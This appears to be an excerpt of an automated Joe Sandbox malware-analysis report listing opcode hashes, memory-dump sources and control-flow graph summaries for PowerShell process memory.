                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8baa2d3b87c22254ec7ed4e95af6c9d548fc145627e6bbeea9d9dbdc537d812c
                                                                                                                                              • Instruction ID: ebc6fccaec2fdf79da61ff6dd02081759ed7e1243b7cfb69135c70aa4ee0d15e
                                                                                                                                              • Opcode Fuzzy Hash: 8baa2d3b87c22254ec7ed4e95af6c9d548fc145627e6bbeea9d9dbdc537d812c
                                                                                                                                              • Instruction Fuzzy Hash: B2F027F16046085BF314BB68D01479F7B96EFC0718F20816ECA0557384CE357805C7E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5faab57fcee746940df02e10b84c57eafbf057dd82e62356fd9903f72bcb77c
                                                                                                                                              • Instruction ID: ad03a70578748f41d17e85372f5f00bf15c465c85cc51d337463ad0f57182410
                                                                                                                                              • Opcode Fuzzy Hash: f5faab57fcee746940df02e10b84c57eafbf057dd82e62356fd9903f72bcb77c
                                                                                                                                              • Instruction Fuzzy Hash: 85E012353005108F97109F1DD454D66F7FAEFCE62531510A9F545CB735DA61EC01DB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 70a9b9976cb97ff23f4d34ae5165fd1c41950f6303d883ab02fe6d1ba4aa0a7c
                                                                                                                                              • Instruction ID: 914457859e2b0dc6e6f2d2d04f9ef3b42d5a8fdafb5e60f11c6f13287e43eba4
                                                                                                                                              • Opcode Fuzzy Hash: 70a9b9976cb97ff23f4d34ae5165fd1c41950f6303d883ab02fe6d1ba4aa0a7c
                                                                                                                                              • Instruction Fuzzy Hash: C6E026A330021A27731064AEA810AF76BDF8BC80A4F4401BB8909D7B53DE44AC0293F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 21d0233bd1d5880b31626d3005e09620298d2b5553bf906c955d8a8bb2b6f2c7
                                                                                                                                              • Instruction ID: 48ac6c1b2917f46937ab61d0e7e135a4ea69bbb111a172de14ad66bbbce3f20a
                                                                                                                                              • Opcode Fuzzy Hash: 21d0233bd1d5880b31626d3005e09620298d2b5553bf906c955d8a8bb2b6f2c7
                                                                                                                                              • Instruction Fuzzy Hash: 06E0223270460067D201622EB80189EBBAADFC9172700402FE50987301DE69FC0587E2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4dfbc416a37dca9f98c0fc1f060a9ef9f6df1383eea400dd9871a11b3732b287
                                                                                                                                              • Instruction ID: 3bb2df2249347ba2fedba7c453af67b4c8b5f784b12e5f35333c58ac0e5a11ad
                                                                                                                                              • Opcode Fuzzy Hash: 4dfbc416a37dca9f98c0fc1f060a9ef9f6df1383eea400dd9871a11b3732b287
                                                                                                                                              • Instruction Fuzzy Hash: 9EE0E5357042005BDB083774EC1D3ED7A57BFC4725F04002ADA1A43241CF2D1C4283D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 709c4b77e0dcd450e89367485c1437880f9ced45b8565531fd4dd6e1f137c5cd
                                                                                                                                              • Instruction ID: 0dcc1092607428e3c725e23b906c37f1142825e0b9d35029db5077989da1b73d
                                                                                                                                              • Opcode Fuzzy Hash: 709c4b77e0dcd450e89367485c1437880f9ced45b8565531fd4dd6e1f137c5cd
                                                                                                                                              • Instruction Fuzzy Hash: 03F08C70A053108BE7609FB8D8D83DA7BA1FF80314F04446AD95ED7281CB386981CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af24116eb1b794b95cdb8e8dfc21f8f68864b79c8c161a0de39de6f873c36b47
                                                                                                                                              • Instruction ID: 1f0a6a947dc8a29ee071e472516b408d32dd61df0157387470eae2d8a98fd831
                                                                                                                                              • Opcode Fuzzy Hash: af24116eb1b794b95cdb8e8dfc21f8f68864b79c8c161a0de39de6f873c36b47
                                                                                                                                              • Instruction Fuzzy Hash: 58F0ED709013149BE764AFB9D89979ABBE5FB44310F104429E65ED7240DB396881CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8e3fbeb6e5166159ee461e5d177c3eb681f9e6aefe7dfd340f320bddeced13d3
                                                                                                                                              • Instruction ID: 2a74f2dfc99cf6991ac71c287d1b5d701d1ce0bb11a61cce63a4a23a92adc571
                                                                                                                                              • Opcode Fuzzy Hash: 8e3fbeb6e5166159ee461e5d177c3eb681f9e6aefe7dfd340f320bddeced13d3
                                                                                                                                              • Instruction Fuzzy Hash: E8E0C9719052499FCB40DFB8C88169AFBF4EF46204B5489EAC849DB611E6319A41CB92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8a008f7e207b4366dc030aeebb776179798680ad5b109183265a8dbc03e96f1e
                                                                                                                                              • Instruction ID: f0d33af055dad245331dac7f2e835ebfde8dd2f50a0af7a1379b7244739e1d3b
                                                                                                                                              • Opcode Fuzzy Hash: 8a008f7e207b4366dc030aeebb776179798680ad5b109183265a8dbc03e96f1e
                                                                                                                                              • Instruction Fuzzy Hash: 38E0803570551457DB093775D81D2ED7A56FBC4725F04012ADA1A83340CF7D5D0553D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 372345f33f7da48c31dfd646b1b8aa1e32cdb08653bea5f0404080ac482a7337
                                                                                                                                              • Instruction ID: 8e193df8e72801221a3144306d9d0c17464a1b390d2285b6886d7f17eb582e0d
                                                                                                                                              • Opcode Fuzzy Hash: 372345f33f7da48c31dfd646b1b8aa1e32cdb08653bea5f0404080ac482a7337
                                                                                                                                              • Instruction Fuzzy Hash: EBD05BD330011E27371474AE541067751CF9AC8494F0541BA9909D3352DD40EC0293F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b062aadf7030057788b7a64d91e4d5943352b37af836418750b32e93d320ac73
                                                                                                                                              • Instruction ID: 70ab7008a260416ae076866f7ba523b7b6e4968475d9f7c02dc285e3d12d0000
                                                                                                                                              • Opcode Fuzzy Hash: b062aadf7030057788b7a64d91e4d5943352b37af836418750b32e93d320ac73
                                                                                                                                              • Instruction Fuzzy Hash: 70D02B227081A5179F0A913E74207A62E9B4BCB16070C807AA50CCB702CC41DC0243E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction ID: c60900a7ade261063ff0fb460c63a9f741ad313e87d9b4d859dc4d580b6c0390
                                                                                                                                              • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction Fuzzy Hash: 60E08631B00114978B089559D8504DDF7BAEBCC220F04C47AD90AA7750DA32791A96E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a13206728e2c88602033dda982203b71dd935ad489fd130d33dd66e2d277bd0e
                                                                                                                                              • Instruction ID: e2e8a0b2dc9be2d85bdda3928cfc59514415a1dfc60c13fdaaec8f8c9feedb5b
                                                                                                                                              • Opcode Fuzzy Hash: a13206728e2c88602033dda982203b71dd935ad489fd130d33dd66e2d277bd0e
                                                                                                                                              • Instruction Fuzzy Hash: 9DE0C231700610679211662EB80089F77EBEFC86B2314802FE90AC7300DE65FC068BD6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 14fa6630b28710f92472402b2a7ffddf2c0665894a1fbac1ba2ef9eb0e7cff14
                                                                                                                                              • Instruction ID: 205107fdcf1583c3c34f6e1bf7d8c3f886706402a0266e46a6c34ab0efc02ae6
                                                                                                                                              • Opcode Fuzzy Hash: 14fa6630b28710f92472402b2a7ffddf2c0665894a1fbac1ba2ef9eb0e7cff14
                                                                                                                                              • Instruction Fuzzy Hash: 16E04F31905209ABCB18BB60F85B4FDBF34F644346B400459DA1653690DB242A46CBD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 78bf95f04647106e2b305e8ae7f72089324d8b9f9cef13a16d2b6e86b18def1a
                                                                                                                                              • Instruction ID: c30e00dcd781985ba722a629aefcf18915ed4c63fca369e6f70e4cce3a3a05a5
                                                                                                                                              • Opcode Fuzzy Hash: 78bf95f04647106e2b305e8ae7f72089324d8b9f9cef13a16d2b6e86b18def1a
                                                                                                                                              • Instruction Fuzzy Hash: 3AE04F35A0A3499BC718EF64E4474FA7FB1EB49200B00415AEA4987351EA301D86DBC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e7bd2905d2a7047650df7acf3dbf8c863076030cd1524ecd56f00bd09cc7b5c7
                                                                                                                                              • Instruction ID: bc23b05124464aca6cc75a5e6defe054758ed680142a2222c68ca1898ee5602a
                                                                                                                                              • Opcode Fuzzy Hash: e7bd2905d2a7047650df7acf3dbf8c863076030cd1524ecd56f00bd09cc7b5c7
                                                                                                                                              • Instruction Fuzzy Hash: F1D05E3504E3846FC3038B79A4504E83FB09D43A1431507DBD4828A253C96A448ACB10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0a92d605928d2267dc61a9cadf112dd15180f7cb2c69cf53a77d52161b7cbd8d
                                                                                                                                              • Instruction ID: d8f4ee5636a11e179ba7c81539ac2ed544a73b0cb50f926349e9caa0dea6d37e
                                                                                                                                              • Opcode Fuzzy Hash: 0a92d605928d2267dc61a9cadf112dd15180f7cb2c69cf53a77d52161b7cbd8d
                                                                                                                                              • Instruction Fuzzy Hash: 63C0123B50D2C00FEF0B82340C260F22F3109AB61030946E7C086E7153C828054A8222
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction ID: 8b4ed5e7d7c2a9c3cdc1d4b6b06c624ca4c98b2731fae56c04ebd5edbfe3f468
                                                                                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction Fuzzy Hash: 1AD06271D042099F8780EFADC94156DFBF4EB49204F5089AA8919D7311F73156129FD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fdd19c1883fceebd03e230a9c9c6a9d6482b24bee8885094f059b65936481295
                                                                                                                                              • Instruction ID: c28488fe2649b4114b01da5c5b0486b3c8e59bacde7cf65e55abbfb933d7886a
                                                                                                                                              • Opcode Fuzzy Hash: fdd19c1883fceebd03e230a9c9c6a9d6482b24bee8885094f059b65936481295
                                                                                                                                              • Instruction Fuzzy Hash: 74D06731905209ABCB08BBA4E85B4FDBB34FA54301F404569D90753590EB252A5ACFC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 026c097ee5a5b99bf953486e3da001567605ce2bcb0ccc3b1a844b1e4fa82e86
                                                                                                                                              • Instruction ID: 7991e682ca41ed86bedf139b93c2f6ee3addd1a587d832f59b8e2627074bc5ee
                                                                                                                                              • Opcode Fuzzy Hash: 026c097ee5a5b99bf953486e3da001567605ce2bcb0ccc3b1a844b1e4fa82e86
                                                                                                                                              • Instruction Fuzzy Hash: 0CD06734A093099BC754FFA4E9474AEBFB5FB85201F10416AD94993350EA346896DBC1
Memory Dump Source
• Source File: 00000011.00000002.1896419896.0000000004510000.00000040.00000800.00020000.00000000.sdmp, Offset: 04510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_4510000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Execution Graph

Execution Coverage: 6.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph 20997 85e7280 20998 85e72c3 SetThreadToken 20997->20998 20999 85e72f1 20998->20999

Control-flow Graph

control_flow_graph 0 4abb569-4abb591 1 4abb593 0->1 2 4abb596-4abb8d1 call 4abaa7c 0->2 1->2 63 4abb8d6-4abb8dd 2->63
Strings
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID: sTdn^$[dn^
• API String ID: 0-1820372456

Control-flow Graph

control_flow_graph 64 4abb578-4abb591 65 4abb593 64->65 66 4abb596-4abb8d1 call 4abaa7c 64->66 65->66 127 4abb8d6-4abb8dd 66->127
Strings
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID: sTdn^$[dn^
• API String ID: 0-1820372456

Control-flow Graph

control_flow_graph 128 85e7278-85e72bb 129 85e72c3-85e72ef SetThreadToken 128->129 130 85e72f8-85e7315 129->130 131 85e72f1-85e72f7 129->131 131->130
APIs
Memory Dump Source
• Source File: 00000017.00000002.1962346923.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_85e0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0

Control-flow Graph

control_flow_graph 134 85e7280-85e72ef SetThreadToken 136 85e72f8-85e7315 134->136 137 85e72f1-85e72f7 134->137 137->136
APIs
Memory Dump Source
• Source File: 00000017.00000002.1962346923.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_85e0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0

Control-flow Graph

control_flow_graph 140 4abae10-4abaea1 148 4abaeab-4abaeb6 140->148 160 4abaeb9 call 4abaf58 148->160 161 4abaeb9 call 4abaf47 148->161 149 4abaebf-4abaf44 call 4aba75c 160->149 161->149
Strings
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID: ^dn^
• API String ID: 0-449800444

Control-flow Graph

control_flow_graph 162 4abae20-4abaeb6 181 4abaeb9 call 4abaf58 162->181 182 4abaeb9 call 4abaf47 162->182 170 4abaebf-4abaf44 call 4aba75c 181->170 182->170
Strings
Memory Dump Source
• Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
Similarity
• API ID:
• String ID: ^dn^
• API String ID: 0-449800444
Memory Dump Source
• Source File: 00000017.00000002.1956789628.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_71e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

control_flow_graph: function starting at 71e3ce8 (node and edge list omitted)
Memory Dump Source
• Source File: 00000017.00000002.1956789628.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_71e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

control_flow_graph: function starting at 71e17b8 (node and edge list omitted)
Memory Dump Source
• Source File: 00000017.00000002.1956789628.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_71e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                              • Opcode ID: af462b09288b2d3c23a54d04df3f1b1efeeee2d76019637b95cabbd04e1501a1
                                                                                                                                              • Instruction ID: 00b1aec1361dabe56320502a0226e2a2cc64301b2343c5bfc9bde7f984fd76c1
                                                                                                                                              • Opcode Fuzzy Hash: af462b09288b2d3c23a54d04df3f1b1efeeee2d76019637b95cabbd04e1501a1
                                                                                                                                              • Instruction Fuzzy Hash: 37B127B1B04749EFDB159BA9D4007AABBEAAFC5210F28C07BD445DB292DB31CD41C7A1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              • Control-flow graph (rendered image; the raw Graphviz edge list is not reproduced here): function starting at 0x4ab29f0, basic blocks 757 to 806 covering 0x4ab29f0 to 0x4ab2d47. The executed / not-executed colouring of the blocks is not recoverable from the text.
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ff7f08afe6f5425d34579d758acf9d720fca4b4521d52fdd00a6befe72fbf1ce
                                                                                                                                              • Instruction ID: cc99eb1f6ce10599bcac0a71e06e8390e135e11408c79234af1b0ffc81b05851
                                                                                                                                              • Opcode Fuzzy Hash: ff7f08afe6f5425d34579d758acf9d720fca4b4521d52fdd00a6befe72fbf1ce
                                                                                                                                              • Instruction Fuzzy Hash: EFA1E071A006458FC706CF58C898AEAFBB5FF49310B2485AAD455EB3A6C735FC51CBA0

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              • Control-flow graph (rendered image; the raw Graphviz edge list is not reproduced here): function starting at 0x4ab7360, basic blocks 906 to 963 covering 0x4ab7360 to 0x4ab75f9. The graph records call edges from the call site at 0x4ab738a to 0x4ab75fc and 0x4ab7617, and from the call site at 0x4ab73f3 to 0x4abc008 and 0x4abc000. The executed / not-executed colouring of the blocks is not recoverable from the text.
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 16e8bea3b05262e7f2b63f16f5d8b97755fda60d2d3a60cc4b6bff73285d0d62
                                                                                                                                              • Instruction ID: b78061ceb8c5c310db5ba744207258646278599dfc913d875bae00cedbb6a390
                                                                                                                                              • Opcode Fuzzy Hash: 16e8bea3b05262e7f2b63f16f5d8b97755fda60d2d3a60cc4b6bff73285d0d62
                                                                                                                                              • Instruction Fuzzy Hash: 0A810738B042148FDB14DF69C494AAABBF5EFCD215F1540A9E846AB362DB74EC01CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b64dd5f32f31e0c692b488ef7148170c8bfec05a61d860af5090a3885eaaddb
                                                                                                                                              • Instruction ID: 419d7ec810a25b5b4362432304586c8ef5c042c7f6cdb3717305bd674b1b10c1
                                                                                                                                              • Opcode Fuzzy Hash: 5b64dd5f32f31e0c692b488ef7148170c8bfec05a61d860af5090a3885eaaddb
                                                                                                                                              • Instruction Fuzzy Hash: 11610470E01248DFDB15DFA9D5847DDBBF5EF88310F24812AE819AB255EB34A845CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 64864050b3b0a1b09c0042e790b277b66a73e8a8dd41f4938471ec58d203af8a
                                                                                                                                              • Instruction ID: 30f0c831857fafba961ceb8a9d4a15fec4b22b44f52c3a9b130c1572e3f32ab0
                                                                                                                                              • Opcode Fuzzy Hash: 64864050b3b0a1b09c0042e790b277b66a73e8a8dd41f4938471ec58d203af8a
                                                                                                                                              • Instruction Fuzzy Hash: 06519E79300215DFE714DB79D844AAA77EAFFC8254F2484A9D849CB352EB75EC01CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dfc9324fc84c13c6c7ceb96ec06279d6edb3976ba52ed4882f8f3aaeec576dd4
                                                                                                                                              • Instruction ID: 6abd2d4b28604738ab3f0c11eeb2a5f5e0f7c7cfacda7063c64d2e3c4ec34730
                                                                                                                                              • Opcode Fuzzy Hash: dfc9324fc84c13c6c7ceb96ec06279d6edb3976ba52ed4882f8f3aaeec576dd4
                                                                                                                                              • Instruction Fuzzy Hash: B4513870E01248CFDB15DFA9D544ACDFBF5EF89310F148029E819AB361EB34A845CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1956789628.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_71e0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
